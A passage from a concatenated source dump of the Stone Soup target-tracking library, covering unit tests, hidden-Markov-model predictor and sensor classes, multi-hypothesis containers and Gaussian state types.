CategoricalDetection(np.random.rand(2), timestamp=now)],
mapping=[0, 1, 3])
detection3 = CompositeDetection([CategoricalDetection(np.random.rand(2), timestamp=now),
CategoricalDetection(np.random.rand(2), timestamp=now)],
mapping=[3, 1])
detections = {detection1, detection2, detection3}
multi_hypothesis = hypothesiser.hypothesise(track, detections, now)
# Test all hypotheses are composite
assert all({isinstance(hypothesis, CompositeHypothesis) for hypothesis in multi_hypothesis})
# Test all detections considered
hyp_detections = {hypothesis.measurement for hypothesis in multi_hypothesis}
for detection in detections:
assert detection in hyp_detections
# Test hypothesis for every detection
assert len(multi_hypothesis) == len(detections) + 1
# Test detections completely present in corresponding hypotheses
for detection in detections:
det_hyp = None
count = 0
for hyp in multi_hypothesis:
if hyp.measurement == detection:
det_hyp = hyp
count += 1
assert det_hyp is not None
assert count == 1
assert isinstance(det_hyp, CompositeProbabilityHypothesis)
# test mapping correct
for i, sub_det_hyp in enumerate(det_hyp):
try:
mapping_index = detection.mapping.index(i)
except ValueError:
assert isinstance(sub_det_hyp.measurement, MissedDetection)
else:
assert sub_det_hyp.measurement == detection[mapping_index]
# Test normalised
assert pytest.approx(sum({hyp.probability for hyp in multi_hypothesis})) == 1
sub_hyps_prob_sum = 0
for hyp in multi_hypothesis:
prod = 1
for sub_hyp in hyp:
prod *= sub_hyp.probability
sub_hyps_prob_sum += prod
# Test no detections
empty_hypotheses = hypothesiser.hypothesise(track, set(), now)
assert isinstance(empty_hypotheses, MultipleHypothesis)
assert len(empty_hypotheses) == 1
null_hyp = next(iter(empty_hypotheses))
assert not null_hyp
# Test contains
for sub_hypothesiser in sub_hypothesisers:
assert sub_hypothesiser in hypothesiser
assert PDAHypothesiser(predictor, updater, clutter_spatial_density=1, prob_detect=1,
prob_gate=1) not in hypothesiser
assert 'a' not in hypothesiser
# Test get
for i, expected_hypothesiser in enumerate(sub_hypothesisers):
assert hypothesiser[i] == expected_hypothesiser
# Test get slice
hypothesiser_slice = hypothesiser[1:]
assert isinstance(hypothesiser_slice, CompositeHypothesiser)
assert hypothesiser_slice.sub_hypothesisers == sub_hypothesisers[1:]
# Test iter
for i, exp_sub_hypothesiser in enumerate(hypothesiser):
assert exp_sub_hypothesiser == sub_hypothesisers[i]
# Test len
assert len(hypothesiser) == 4
```
#### File: measurement/tests/test_categorical.py
```python
import numpy as np
import pytest
from ....models.measurement.categorical import MarkovianMeasurementModel
from ....types.array import StateVector
from ....types.state import CategoricalState
def test_categorical_measurement_model():
# 3 hidden categories, 4 measurement categories
E = np.array([[30, 25, 5],
[20, 25, 10],
[10, 25, 80],
[40, 25, 5]])
# Test mismatched number of category names
with pytest.raises(ValueError, match="ndim_meas of 4 does not match number of measurement "
"categories 2"):
MarkovianMeasurementModel(E, measurement_categories=['red', 'blue'])
model = MarkovianMeasurementModel(E)
# Test default category names
assert model.measurement_categories == ['0', '1', '2', '3']
# Test normalised
expected_array = np.array([[3 / 10, 1 / 4, 1 / 20],
[2 / 10, 1 / 4, 2 / 20],
[1 / 10, 1 / 4, 16 / 20],
[4 / 10, 1 / 4, 1 / 20]])
assert np.allclose(model.emission_matrix, expected_array)
# Test ndim
assert model.ndim_state == 3
assert model.ndim_meas == 4
state = CategoricalState([80, 10, 10])
# Test function
new_vector = model.function(state, noise=False)
assert isinstance(new_vector, StateVector)
assert new_vector.shape[0] == 4
assert np.isclose(np.sum(new_vector), 1)
# Test mapping
assert np.array_equal(model.mapping, [0, 1, 2])
```
#### File: transition/tests/test_categorical.py
```python
from datetime import datetime, timedelta
import numpy as np
from ..categorical import MarkovianTransitionModel
from ....types.array import StateVector
from ....types.state import CategoricalState
def test_categorical_transition_model():
# 3 categories
F = np.array([[50, 5, 30],
[25, 90, 30],
[25, 5, 30]])
model = MarkovianTransitionModel(F)
# Test normalised
expected_array = np.array([[2 / 4, 1 / 20, 1 / 3],
[1 / 4, 18 / 20, 1 / 3],
[1 / 4, 1 / 20, 1 / 3]])
assert np.allclose(model.transition_matrix, expected_array)
# Test ndim
assert model.ndim == 3
assert model.ndim_state == 3
state = CategoricalState([80, 10, 10], timestamp=datetime.now())
# Test function (noiseless)
new_vector = model.function(state, time_interval=timedelta(seconds=1), noise=False)
assert isinstance(new_vector, StateVector)
assert new_vector.shape[0] == 3
assert np.isclose(np.sum(new_vector), 1)
# Test function (noisy)
new_vector = model.function(state, time_interval=timedelta(seconds=1), noise=True)
assert isinstance(new_vector, StateVector)
assert new_vector.shape[0] == 3
assert np.count_nonzero(new_vector) == 1 # basis vector
# Test 0 time-interval function
new_vector = model.function(state, time_interval=timedelta(seconds=0))
assert np.allclose(new_vector, state.state_vector)
# Test no time-interval
new_vector = model.function(state)
assert np.allclose(new_vector, state.state_vector)
```
#### File: stonesoup/predictor/categorical.py
```python
from ..base import Property
from ..models.transition.categorical import MarkovianTransitionModel
from ..predictor import Predictor
from ..predictor._utils import predict_lru_cache
from ..types.prediction import Prediction
class HMMPredictor(Predictor):
r"""Hidden Markov model predictor
Assumes transition model is time-invariant, and therefore care should be taken when predicting
forward to the same time."""
transition_model: MarkovianTransitionModel = Property(
doc="The transition model used to predict states forward in `time`."
)
@predict_lru_cache()
def predict(self, prior, timestamp=None, **kwargs):
r"""Predicts a :class:`~.CategoricalState` forward using the :attr:`transition_model`.
Parameters
----------
prior : :class:`~.CategoricalState`
:math:`\alpha_{t-1}`
timestamp : :class:`datetime.datetime`, optional
:math:`t`
**kwargs :
These are passed to the :meth:`transition_model.function` method.
Returns
-------
: :class:`~.CategoricalStatePrediction`
The predicted state.
Notes
-----
The Markovian transition model is time-invariant and the evaluated `time_interval` can be
`None`.
"""
predict_over_interval = self._predict_over_interval(prior, timestamp)
prediction_vector = self.transition_model.function(prior,
time_interval=predict_over_interval,
**kwargs)
return Prediction.from_state(prior, prediction_vector, timestamp=timestamp,
transition_model=self.transition_model)
def _predict_over_interval(self, prior, timestamp):
"""Private method to get the prediction interval (or None)
Parameters
----------
prior : :class:`~.State`
The prior state
timestamp : :class:`datetime.datetime`, optional
The (current) timestamp
Returns
-------
: :class:`datetime.timedelta`
time interval to predict over
"""
# Deal with undefined timestamps
if timestamp is None or prior.timestamp is None:
predict_over_interval = None
else:
predict_over_interval = timestamp - prior.timestamp
return predict_over_interval
```
#### File: stonesoup/predictor/particle.py
```python
from .base import Predictor
from ._utils import predict_lru_cache
from .kalman import KalmanPredictor, ExtendedKalmanPredictor
from ..base import Property
from ..types.prediction import Prediction
from ..types.state import GaussianState
class ParticlePredictor(Predictor):
"""ParticlePredictor class
An implementation of a Particle Filter predictor.
"""
@predict_lru_cache()
def predict(self, prior, control_input=None, timestamp=None, **kwargs):
"""Particle Filter prediction step
Parameters
----------
prior : :class:`~.ParticleState`
A prior state object
control_input : :class:`~.State`, optional
The control input. It will only have an effect if
:attr:`control_model` is not `None` (the default is `None`)
timestamp: :class:`datetime.datetime`, optional
A timestamp signifying when the prediction is performed
(the default is `None`)
Returns
-------
: :class:`~.ParticleStatePrediction`
The predicted state
"""
# Compute time_interval
try:
time_interval = timestamp - prior.timestamp
except TypeError:
# TypeError: (timestamp or prior.timestamp) is None
time_interval = None
new_state_vector = self.transition_model.function(
prior,
noise=True,
time_interval=time_interval,
num_samples=len(prior),
**kwargs)
return Prediction.from_state(prior, state_vector=new_state_vector, weight=prior.weight,
timestamp=timestamp, particle_list=None,
transition_model=self.transition_model)
class ParticleFlowKalmanPredictor(ParticlePredictor):
"""Gromov Flow Parallel Kalman Particle Predictor
This is a wrapper around the :class:`~.GromovFlowParticlePredictor` which
can use a :class:`~.ExtendedKalmanPredictor` or
:class:`~.UnscentedKalmanPredictor` in parallel in order to maintain a
state covariance, as proposed in [1]_.
This should be used in conjunction with the
:class:`~.ParticleFlowKalmanUpdater`.
Parameters
----------
References
----------
.. [1] <NAME>, <NAME>., "Implementation of the Daum-Huang
Exact-Flow Particle Filter" 2012
"""
kalman_predictor: KalmanPredictor = Property(
default=None,
doc="Kalman predictor to use. Default `None` where a new instance of"
":class:`~.ExtendedKalmanPredictor` will be created utilising the"
"same transition model.")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if self.kalman_predictor is None:
self.kalman_predictor = ExtendedKalmanPredictor(
self.transition_model)
def predict(self, prior, *args, **kwargs):
particle_prediction = super().predict(prior, *args, **kwargs)
kalman_prediction = self.kalman_predictor.predict(
GaussianState(prior.state_vector, prior.covar, prior.timestamp),
*args, **kwargs)
return Prediction.from_state(prior, state_vector=particle_prediction.state_vector,
weight=particle_prediction.weight,
timestamp=particle_prediction.timestamp,
fixed_covar=kalman_prediction.covar, particle_list=None,
transition_model=self.transition_model)
```
#### File: sensor/action/__init__.py
```python
import datetime
from abc import abstractmethod
from typing import Iterator, Any
from ...base import Base, Property
class Action(Base):
"""The base class for an action that can be taken by a sensor or platform with an
:class:`~.ActionableProperty`."""
generator: Any = Property(default=None,
readonly=True,
doc="Action generator that created the action.")
end_time: datetime.datetime = Property(readonly=True,
doc="Time at which modification of the "
"attribute ends.")
target_value: Any = Property(doc="Target value.")
def act(self, current_time, timestamp, init_value):
"""Return the attribute modified.
Parameters
----------
current_time: datetime.datetime
Current time
timestamp: datetime.datetime
Modification of attribute ends at this time stamp
init_value: Any
Current value of the modifiable attribute
Returns
-------
Any
The new value of the attribute
"""
raise NotImplementedError()
def __eq__(self, other):
if not isinstance(other, type(self)):
return False
return all(getattr(self, name) == getattr(other, name) for name in type(self).properties)
def __hash__(self):
return hash(tuple(getattr(self, name) for name in type(self).properties))
class ActionGenerator(Base):
"""The base class for an action generator."""
owner: object = Property(doc="Actionable object that has the attribute to be modified.")
attribute: str = Property(doc="The name of the attribute to be modified.")
start_time: datetime.datetime = Property(doc="Start time of action.")
end_time: datetime.datetime = Property(doc="End time of action.")
resolution: float = Property(default=None, doc="Resolution of action space")
@abstractmethod
def __contains__(self, item):
raise NotImplementedError()
@abstractmethod
def __iter__(self) -> Iterator[Action]:
raise NotImplementedError()
@property
def current_value(self):
return getattr(self.owner, self.attribute)
@property
def default_action(self):
"""The default action to modify the property if there is no given action."""
raise NotImplementedError()
class RealNumberActionGenerator(ActionGenerator):
"""Action generator where action is a choice of a real number."""
@property
@abstractmethod
def initial_value(self):
raise NotImplementedError
@property
@abstractmethod
def min(self):
raise NotImplementedError
@property
@abstractmethod
def max(self):
raise NotImplementedError
```
#### File: stonesoup/sensor/categorical.py
```python
from scipy.stats import multinomial
from ..base import Property
from ..models.measurement.categorical import MarkovianMeasurementModel
from ..sensor.sensor import Sensor
from ..types.array import StateVector
from ..types.detection import TrueCategoricalDetection
class HMMSensor(Sensor):
r"""Sensor model that observes a categorical state space and returns categorical measurements.
Measurements are categorical distributions over a finite set of categories
:math:`Z = \{\zeta^n|n\in \mathbf{N}, n\le N\}` (for some finite :math:`N`).
"""
measurement_model: MarkovianMeasurementModel = Property(
doc="Measurement model to generate detection vectors from"
)
@property
def ndim_state(self):
return self.measurement_model.ndim_state
@property
def ndim_meas(self):
return self.measurement_model.ndim_meas
def measure(self, ground_truths, noise: bool = True, **kwargs):
r"""Generate a categorical measurement for a given set of true categorical state.
Parameters
----------
ground_truths: Set[:class:`~.CategoricalGroundTruthState`]
A set of :class:`~.CategoricalGroundTruthState`.
noise: bool
Indicates whether measurement vectors are sampled from and the resultant measurement
categories returned instead. These are discrete categories instead of a distribution
over the measurement space. They are represented by N-tuples, with all components
equal to 0, except at an index corresponding to the relevant category.
For example :math:`e^k` indicates that the measurement category is :math:`\zeta^k`.
If `False`, the resultant distribution is returned.
Returns
-------
Set[:class:`~.TrueCategoricalDetection`]
A set of measurements generated from the given states. The timestamps of the
measurements are set equal to that of the corresponding states that they were
calculated from. Each measurement stores the ground truth path that it was produced
from.
"""
detections = set()
for truth in ground_truths:
timestamp = truth.timestamp
detection_vector = self.measurement_model.function(truth, noise=noise, **kwargs)
if noise:
# Sample from resultant distribution
rv = multinomial(n=1, p=detection_vector.flatten())
detection_vector = StateVector(rv.rvs(size=1, random_state=None))
detection = TrueCategoricalDetection(
state_vector=detection_vector,
timestamp=timestamp,
categories=self.measurement_model.measurement_categories,
measurement_model=self.measurement_model,
groundtruth_path=truth
)
detections.add(detection)
return detections
```
#### File: tracker/tests/test_pointprocess.py
```python
import datetime
import numpy as np
from ..pointprocess import PointProcessMultiTargetTracker
from ...types.state import TaggedWeightedGaussianState
from ...mixturereducer.gaussianmixture import GaussianMixtureReducer
from ...updater.pointprocess import PHDUpdater
from ...hypothesiser.gaussianmixture import GaussianMixtureHypothesiser
from ...hypothesiser.distance import DistanceHypothesiser
from ... import measures
from ...models.measurement.linear import LinearGaussian
from ...updater.kalman import KalmanUpdater
def test_point_process_multi_target_tracker_cycle(detector, predictor):
previous_time = datetime.datetime(2018, 1, 1, 13, 59)
timestamp = datetime.datetime.now()
birth_mean = np.array([[40]])
birth_covar = np.array([[1000]])
birth_component = TaggedWeightedGaussianState(
birth_mean,
birth_covar,
weight=0.3,
tag=TaggedWeightedGaussianState.BIRTH,
timestamp=timestamp)
# Initialise a Kalman Updater
measurement_model = LinearGaussian(ndim_state=1, mapping=[0],
noise_covar=np.array([[0.04]]))
updater = KalmanUpdater(measurement_model=measurement_model)
# Initialise a Gaussian Mixture hypothesiser
measure = measures.Mahalanobis()
base_hypothesiser = DistanceHypothesiser(
predictor, updater, measure=measure, missed_distance=16)
hypothesiser = GaussianMixtureHypothesiser(hypothesiser=base_hypothesiser,
order_by_detection=True)
# Initialise a Gaussian Mixture reducer
merge_threshold = 4
prune_threshold = 1e-5
reducer = GaussianMixtureReducer(prune_threshold=prune_threshold,
merge_threshold=merge_threshold)
# Initialise a Point Process updater
phd_updater = PHDUpdater(updater=updater, prob_detection=0.8)
tracker = PointProcessMultiTargetTracker(
detector=detector,
updater=phd_updater,
hypothesiser=hypothesiser,
reducer=reducer,
birth_component=birth_component
)
for time, tracks in tracker:
assert time == previous_time + datetime.timedelta(minutes=1)
assert tracker.estimated_number_of_targets > 0
assert tracker.estimated_number_of_targets < 4
previous_time = time
# Shouldn't have more than three active tracks
assert (len(tracks) >= 1) & (len(tracks) <= 3)
# All tracks should have unique IDs
assert len(tracker.gaussian_mixture.component_tags) == len(tracker.gaussian_mixture)
```
#### File: stonesoup/types/multihypothesis.py
```python
from collections.abc import Sized, Iterable, Container
from typing import Sequence
from .detection import MissedDetection
from .numeric import Probability
from ..base import Property
from ..types import Type
from ..types.detection import Detection
from ..types.hypothesis import SingleHypothesis, CompositeHypothesis
from ..types.prediction import Prediction
class MultipleHypothesis(Type, Sized, Iterable, Container):
"""Multiple Hypothesis base type
A Multiple Hypothesis is a container to store a collection of hypotheses.
"""
single_hypotheses: Sequence[SingleHypothesis] = Property(
default=None,
doc="The initial list of :class:`~.SingleHypothesis`. Default `None` "
"which initialises with empty list.")
normalise: bool = Property(
default=False,
doc="Normalise probabilities of :class:`~.SingleHypothesis`. Default "
"is `False`.")
total_weight: float = Property(
default=1,
doc="When normalising, weights will sum to this. Default is 1.")
def __init__(self, single_hypotheses=None, normalise=False, *args,
**kwargs):
if single_hypotheses is None:
single_hypotheses = []
if any(not isinstance(hypothesis, SingleHypothesis)
for hypothesis in single_hypotheses):
raise ValueError("Cannot form MultipleHypothesis out of "
"non-SingleHypothesis inputs!")
super().__init__(single_hypotheses, normalise, *args, **kwargs)
# normalise the weights of 'single_hypotheses', if indicated
if self.normalise:
self.normalise_probabilities()
def __len__(self):
return self.single_hypotheses.__len__()
def __contains__(self, index):
# check if 'single_hypotheses' contains any SingleHypotheses with
# Detection matching 'index'
if isinstance(index, Detection):
for hypothesis in self.single_hypotheses:
if hypothesis.measurement is index:
return True
return False
# check if 'single_hypotheses' contains any SingleHypotheses with
# Prediction matching 'index'
if isinstance(index, Prediction):
for hypothesis in self.single_hypotheses:
if hypothesis.prediction is index:
return True
return False
# check if 'single_hypotheses' contains any SingleHypotheses
# matching 'index'
if isinstance(index, SingleHypothesis):
return index in self.single_hypotheses
def __iter__(self):
for hypothesis in self.single_hypotheses:
yield hypothesis
def __getitem__(self, index):
# retrieve SingleHypothesis by array index
if isinstance(index, int):
return self.single_hypotheses[index]
# retrieve SingleHypothesis by measurement
if isinstance(index, Detection):
for hypothesis in self.single_hypotheses:
if hypothesis.measurement is index:
return hypothesis
return None
# retrieve SingleHypothesis by prediction
if isinstance(index, Prediction):
for hypothesis in self.single_hypotheses:
if hypothesis.prediction is index:
return hypothesis
return None
def normalise_probabilities(self, total_weight=None):
if total_weight is None:
total_weight = self.total_weight
# verify that SingleHypotheses composing this MultipleHypothesis
# all have Probabilities
if any(not hasattr(hypothesis, 'probability')
for hypothesis in self.single_hypotheses):
raise ValueError("MultipleHypothesis not composed of Probability"
" hypotheses!")
sum_weights = Probability.sum(
hypothesis.probability for hypothesis in self.single_hypotheses)
for hypothesis in self.single_hypotheses:
hypothesis.probability =\
(hypothesis.probability * total_weight)/sum_weights
def get_missed_detection_probability(self):
for hypothesis in self.single_hypotheses:
if isinstance(hypothesis.measurement, MissedDetection):
if hasattr(hypothesis, 'probability'):
return hypothesis.probability
return None
class MultipleCompositeHypothesis(Type, Sized, Iterable, Container):
"""Multiple composite hypothesis type
A Multiple Composite Hypothesis is a container to store a collection of composite hypotheses.
Interfaces the same as MultipleHypothesis, but permits different input, hence methods are
redefined.
"""
single_hypotheses: Sequence[CompositeHypothesis] = Property(
default=None,
doc="The initial list of :class:`~.CompositeHypothesis`. Default `None` which initialises "
"with empty list.")
normalise: bool = Property(
default=False,
doc="Normalise probabilities of :class:`~.CompositeHypothesis`. Default is `False`.")
total_weight: float = Property(
default=1,
doc="When normalising, weights will sum to this. Default is 1.")
def __init__(self, single_hypotheses=None, normalise=False, *args,
**kwargs):
if single_hypotheses is None:
single_hypotheses = []
if not all(isinstance(hypothesis, CompositeHypothesis)
for hypothesis in single_hypotheses):
raise ValueError("Cannot form MultipleHypothesis out of "
"non-CompositeHypothesis inputs!")
super().__init__(single_hypotheses, normalise, *args, **kwargs)
# normalise the weights of 'single_hypotheses', if indicated
if self.normalise:
self.normalise_probabilities()
def __contains__(self, index):
# cannot check instance index is detection or prediction as composite hypotheses create
# their own composite detections and predictions
# check if 'single_hypotheses' contains any CompositeHypotheses matching 'index'
# use `is` as standard list __contains__ checks for equality which may not work in cases
# where hypotheses do not all share same attributes
if isinstance(index, CompositeHypothesis):
return any(index is single_hypothesis for single_hypothesis in self.single_hypotheses)
def __getitem__(self, index):
return self.single_hypotheses.__getitem__(index)
def __iter__(self):
return self.single_hypotheses.__iter__()
def __len__(self):
return self.single_hypotheses.__len__()
def normalise_probabilities(self, total_weight=None):
if total_weight is None:
total_weight = self.total_weight
# verify that SingleHypotheses composing this MultipleHypothesis
# all have Probabilities
if any(not hasattr(hypothesis, 'probability')
for hypothesis in self.single_hypotheses):
raise ValueError(
"MultipleHypothesis not composed of composite hypotheses with probabilities")
sum_weights = Probability.sum(
hypothesis.probability for hypothesis in self.single_hypotheses)
# this will NOT affect the probabilities of each composite hypothesis' sub-hypotheses
for hypothesis in self.single_hypotheses:
hypothesis.probability = \
(hypothesis.probability * total_weight) / sum_weights
def get_missed_detection_probability(self):
for hypothesis in self.single_hypotheses:
if hasattr(hypothesis, 'probability') and not hypothesis:
return hypothesis.probability
return None
```
#### File: stonesoup/types/state.py
```python
import datetime
import uuid
from collections import abc
from typing import MutableSequence, Any, Optional, Sequence
import typing
import numpy as np
from ..base import Property
from .array import StateVector, CovarianceMatrix, PrecisionMatrix, StateVectors
from .base import Type
from .particle import Particle
from .numeric import Probability
class State(Type):
"""State type.
Most simple state type, which only has time and a state vector."""
timestamp: datetime.datetime = Property(
default=None, doc="Timestamp of the state. Default None.")
state_vector: StateVector = Property(doc='State vector.')
def __init__(self, state_vector, *args, **kwargs):
# Don't cast away subtype of state_vector if not necessary
if state_vector is not None \
and not isinstance(state_vector, (StateVector, StateVectors)):
state_vector = StateVector(state_vector)
super().__init__(state_vector, *args, **kwargs)
@property
def ndim(self):
"""The number of dimensions represented by the state."""
return self.state_vector.shape[0]
@staticmethod
def from_state(state: 'State', *args: Any, target_type: Optional[typing.Type] = None,
**kwargs: Any) -> 'State':
"""Class utility function to create a new state (or compatible type) from an existing
state. The type and properties of this new state are defined by `state` except for any
explicitly overwritten via `args` and `kwargs`.
It acts similarly in feel to a copy constructor, with the optional over-writing of
properties.
Parameters
----------
state: State
:class:`~.State` to use existing properties from, and identify new state-type from.
\\*args: Sequence
Arguments to pass to newly created state, replacing those with same name in `state`.
target_type: Type, optional
Optional argument specifying the type of of object to be created. This need not
necessarily be :class:`~.State` subclass. Any arguments that match between the input
`state` and the target type will be copied from the old to the new object (except those
explicitly specified in `args` and `kwargs`.
\\*\\*kwargs: Mapping
New property names and associate value for use in newly created state, replacing those
on the `state` parameter.
"""
# Handle being initialised with state sequence
if isinstance(state, StateMutableSequence):
state = state.state
if target_type is None:
target_type = type(state)
args_property_names = {
name for n, name in enumerate(target_type.properties) if n < len(args)}
new_kwargs = {
name: getattr(state, name)
for name in type(state).properties.keys() & target_type.properties.keys()
if name not in args_property_names}
new_kwargs.update(kwargs)
return target_type(*args, **new_kwargs)
class CreatableFromState:
class_mapping = {}
def __init_subclass__(cls, **kwargs):
bases = cls.__bases__
if CreatableFromState in bases:
# Direct subclasses should not be added to the class mapping, only subclasses of
# subclasses
return
if len(bases) != 2:
raise TypeError('A CreatableFromState subclass must have exactly two superclasses')
base_class, state_type = cls.__bases__
if not issubclass(base_class, CreatableFromState):
raise TypeError('The first superclass of a CreatableFromState subclass must be a '
'CreatableFromState (or a subclass)')
if not issubclass(state_type, State):
# Non-state subclasses do not need adding to the class mapping, as they should not
# be created from States
return
if base_class not in CreatableFromState.class_mapping:
CreatableFromState.class_mapping[base_class] = {}
CreatableFromState.class_mapping[base_class][state_type] = cls
super().__init_subclass__(**kwargs)
@classmethod
def from_state(
cls,
state: State,
*args: Any,
target_type: Optional[type] = None,
**kwargs: Any) -> 'State':
"""
Return new object instance of suitable type from an existing `state`.
The type returned can be explicitly specified using the `target_type` argument, otherwise
it is chosen by introspection of the created subclasses of this type: see below for an
example. Any compatible properties are copied from the input `state` to the returned
object, except for those specified by `args` and `kwargs`, which take precedence over those
from the input `state`.
This method is primarily concerned with type selection, with actual copying performed by
the static :meth:`~.State.from_state` method. As an example of the type selection
algorithm, consider the case of the class
`GaussianStatePrediction(Prediction, GaussianState)`. This is subclass of `Prediction`,
and `GaussianState` and so the `class_mapping` property will have an entry added (when
`GaussianStatePrediction` is defined) such that
`class_mapping[Prediction][GaussianState] = GaussianStatePrediction`. If this method is
then called like below
>>>> gaussian_state = GaussianState(some_arguments)
>>>> new_prediction = Prediction.from_state(gaussian_state, *args, **kwargs)
then the `from_state` method will look up the class mapping and see that
`Prediction.from_state()` called with a `GaussianState` input should return a
`GaussianStatePrediction` object, and therefore the type of `new_prediction` will be
`GaussianStatePrediction`
The functionality is currently used by :class:`~.Prediction` and :class:`~.Updater`
objects.
Parameters
----------
state: State
:class:`~.State` to use existing properties from, and identify prediction type from
\\*args: Sequence
Arguments to pass to newly created prediction, replacing those with same name on
``state`` parameter.
target_type: Type, optional
Type to use for prediction, overriding one from :attr:`class_mapping`.
\\*\\*kwargs: Mapping
New property names and associate value for use in newly created prediction, replacing
those on the ``state`` parameter.
"""
# Handle being initialised with state sequence
if isinstance(state, StateMutableSequence):
state = state.state
try:
state_type = next(type_ for type_ in type(state).mro()
if type_ in CreatableFromState.class_mapping[cls])
except StopIteration:
raise TypeError(f'{cls.__name__} type not defined for {type(state).__name__}')
if target_type is None:
target_type = CreatableFromState.class_mapping[cls][state_type]
return State.from_state(state, *args, **kwargs, target_type=target_type)
class StateMutableSequence(Type, abc.MutableSequence):
"""A mutable sequence for :class:`~.State` instances
This sequence acts like a regular list object for States, as well as
proxying state attributes to the last state in the sequence. This sequence
can also be indexed/sliced by :class:`datetime.datetime` instances.
Example
-------
>>> t0 = datetime.datetime(2018, 1, 1, 14, 00)
>>> t1 = t0 + datetime.timedelta(minutes=1)
>>> state0 = State([[0]], t0)
>>> sequence = StateMutableSequence([state0])
>>> print(sequence.state_vector, sequence.timestamp)
[[0]] 2018-01-01 14:00:00
>>> sequence.append(State([[1]], t1))
>>> for state in sequence[t1:]:
... print(state.state_vector, state.timestamp)
[[1]] 2018-01-01 14:01:00
"""
states: MutableSequence[State] = Property(
default=None,
doc="The initial list of states. Default `None` which initialises with empty list.")
def __init__(self, states=None, *args, **kwargs):
if states is None:
states = []
elif not isinstance(states, abc.Sequence):
# Ensure states is a list
states = [states]
super().__init__(states, *args, **kwargs)
def __len__(self):
return self.states.__len__()
def __setitem__(self, index, value):
return self.states.__setitem__(index, value)
def __delitem__(self, index):
return self.states.__delitem__(index)
def __getitem__(self, index):
if isinstance(index, slice) and (
isinstance(index.start, datetime.datetime)
or isinstance(index.stop, datetime.datetime)):
items = []
for state in self.states:
try:
if index.start and state.timestamp < index.start:
continue
if index.stop and state.timestamp >= index.stop:
continue
except TypeError as exc:
raise TypeError(
'both indices must be `datetime.datetime` objects for'
'time slice') from exc
items.append(state)
return StateMutableSequence(items[::index.step])
elif isinstance(index, datetime.datetime):
for state in reversed(self.states):
if state.timestamp == index:
return state
else:
raise IndexError('timestamp not found in states')
elif isinstance(index, slice):
return StateMutableSequence(self.states.__getitem__(index))
else:
return self.states.__getitem__(index)
def __getattribute__(self, name):
# This method is called if we try to access an attribute of self. First we try to get the
# attribute directly, but if that fails, we want to try getting the same attribute from
# self.state instead. If that, in turn, fails we want to return the error message that
# would have originally been raised, rather than an error message that the State has no
# such attribute.
#
# An alternative mechanism using __getattr__ seems simpler (as it skips the first few lines
# of code, but __getattr__ has no mechanism to capture the originally raised error.
try:
# This tries first to get the attribute from self.
return Type.__getattribute__(self, name)
except AttributeError as original_error:
if name.startswith("_"):
# Don't proxy special/private attributes to `state`, just raise the original error
raise original_error
else:
# For non _ attributes, try to get the attribute from self.state instead of self.
try:
my_state = Type.__getattribute__(self, 'state')
return getattr(my_state, name)
except AttributeError:
# If we get the error about 'State' not having the attribute, then we want to
# raise the original error instead
raise original_error
def insert(self, index, value):
return self.states.insert(index, value)
@property
def state(self):
return self.states[-1]
def last_timestamp_generator(self):
"""Generator yielding the last state for each timestamp
This provides a method of iterating over a sequence of states,
such that when multiple states for the same timestamp exist,
only the last state is yielded. This is particularly useful in
cases where you may have multiple :class:`~.Update` states for
a single timestamp e.g. multi-sensor tracking example.
Yields
------
State
A state for each timestamp present in the sequence.
"""
state_iter = iter(self)
current_state = next(state_iter)
for next_state in state_iter:
if next_state.timestamp > current_state.timestamp:
yield current_state
current_state = next_state
yield current_state
class GaussianState(State):
"""Gaussian State type
This is a simple Gaussian state object, which, as the name suggests,
is described by a Gaussian state distribution.
"""
covar: CovarianceMatrix = Property(doc='Covariance matrix of state.')
def __init__(self, state_vector, covar, *args, **kwargs):
# Don't cast away subtype of covar if not necessary
if not isinstance(covar, CovarianceMatrix):
covar = CovarianceMatrix(covar)
super().__init__(state_vector, covar, *args, **kwargs)
if self.state_vector.shape[0] != self.covar.shape[0]:
raise ValueError(
"state vector and covariance should have same dimensions")
@property
def mean(self):
"""The state mean, equivalent to state vector"""
return self.state_vector
class SqrtGaussianState(State):
"""A Gaussian State type where the covariance matrix is stored in a form :math:`W` such that
:math:`P = WW^T`
For :math:`P` in general, :math:`W` is not unique and the user may choose the form to their
taste. No checks are undertaken to ensure that a sensible square root form has been chosen.
"""
sqrt_covar: CovarianceMatrix = Property(doc="A square root form of the Gaussian covariance "
"matrix.")
def __init__(self, state_vector, sqrt_covar, *args, **kwargs):
sqrt_covar = CovarianceMatrix(sqrt_covar)
super().__init__(state_vector, sqrt_covar, *args, **kwargs)
@property
def mean(self):
"""The state mean, equivalent to state vector"""
return self.state_vector
@property
def covar(self):
"""The full covariance matrix.
Returns
-------
: :class:`~.CovarianceMatrix`
The covariance matrix calculated via :math:`W W^T`, where :math:`W` is a
:class:`~.SqrtCovarianceMatrix`
"""
return self.sqrt_covar @ self.sqrt_covar.T
GaussianState.register(SqrtGaussianState) # noqa: E305
class InformationState(State):
r"""Information State Type
The information state class carries the :attr:`state_vector`,
:math:`\mathbf{y}_k = Y_k \mathbf{x}_k` and the precision or information matrix
:math:`Y_k = P_k^{-1}`, where :math:`\mathbf{x}_k` and :math:`P_k` are the mean and
covariance, respectively, of a Gaussian state.
"""
precision: PrecisionMatrix = Property(doc='precision matrix of state.')
class WeightedGaussianState(GaussianState):
"""Weighted Gaussian State Type
Gaussian State object with an associated weight. Used as components
for a GaussianMixtureState.
"""
weight: Probability = Property(default=0, doc="Weight of the Gaussian State.")
@property
def gaussian_state(self):
"""The Gaussian state."""
return GaussianState(self.state_vector,
self.covar,
timestamp=self.timestamp)
@classmethod
def from_gaussian_state(cls, gaussian_state, *args, copy=True, **kwargs):
r"""
Returns a WeightedGaussianState instance based on the gaussian_state.
Parameters
----------
gaussian_state : :class:`~.GaussianState`
The guassian_state used to create the new WeightedGaussianState.
\*args : See main :class:`~.WeightedGaussianState`
args are passed to :class:`~.WeightedGaussianState` __init__()
copy : Boolean, optional
If True, the WeightedGaussianState is created with copies of the elements
of gaussian_state. The default is True.
\*\*kwargs : See main :class:`~.WeightedGaussianState`
kwargs are passed to :class:`~.WeightedGaussianState` __init__()
Returns
-------
:class:`~.WeightedGaussianState`
Instance of WeightedGaussianState.
"""
state_vector = gaussian_state.state_vector
covar = gaussian_state.covar
timestamp = gaussian_state.timestamp
if copy:
state_vector = state_vector.copy()
covar = covar.copy()
return cls(
state_vector=state_vector,
covar=covar,
timestamp=timestamp,
*args, **kwargs
)
class TaggedWeightedGaussianState(WeightedGaussianState):
"""Tagged Weighted Gaussian State Type
Gaussian State object with an associated weight and tag. Used as components
